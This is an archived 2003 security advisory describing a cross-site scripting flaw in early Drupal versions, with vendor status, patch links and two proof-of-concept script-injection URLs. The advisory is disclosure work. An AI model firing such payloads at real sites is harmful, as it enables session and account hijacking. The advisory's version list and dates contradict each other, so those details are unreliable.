TUCoPS :: Web :: Apps :: bt683.txt

Drupal XSS Vulnerability (main page and sub pages) 


------------------------------------------------------
Drupal XSS Vulnerability (main page and sub pages)
------------------------------------------------------
Any kind of XSS attacks possibility. An attacker could access other
users/admin drupal accounts.

------------------------------------------------------
About Drupal;
------------------------------------------------------
www.drupal.com
Drupal is an open-source platform and content management system for building
dynamic web sites offering a broad range of features and services including
user administration, publishing workflow, discussion capabilities, news
aggregation, metadata functionalities using controlled vocabularies and XML
publishing for content sharing purposes. Equipped with a powerful blend of
features and configurability, Drupal can support a diverse range of web
projects ranging from personal weblogs to large community-driven sites.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
TESTED;
 Drupal 4.2.0 RC

NOT TESTED - %90 VULNERABLE;
 Drupal 4.1.0
 Drupal 4.0.0
 Drupal 3.0.2
 Drupal 3.0.1
 Drupal 3.0.0
 Drupal 2.0.0
 Drupal 1.0.0

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
Drupal 4.2.0 RC

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and fixed quickly.

------------------------------------------------------
Solution & Patches;
------------------------------------------------------
xss-cvs.patch
xss-4.2.0-rc.patch
xss-4.1.0.patch

Download Patch Files :
http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip
Better one download new version from www.drupal.org

[All files provided by Vendor]

------------------------------------------------------
Exploit Code;
------------------------------------------------------
http://[victim]/xxx"][script]alert(document.domain)]/script]["

------------------------------------------------------
Exploit - 2;
------------------------------------------------------
http://[victim]/node/view/666"><script>alert(document.domain)</script>

Replace "[]","<>"

------------------------------------------------------
History;
------------------------------------------------------
30.05.2003 - Discovered
03.05.2003 - Vendor Informed
03.05.2003 - Fixed by Vendor


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh@mavituna.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH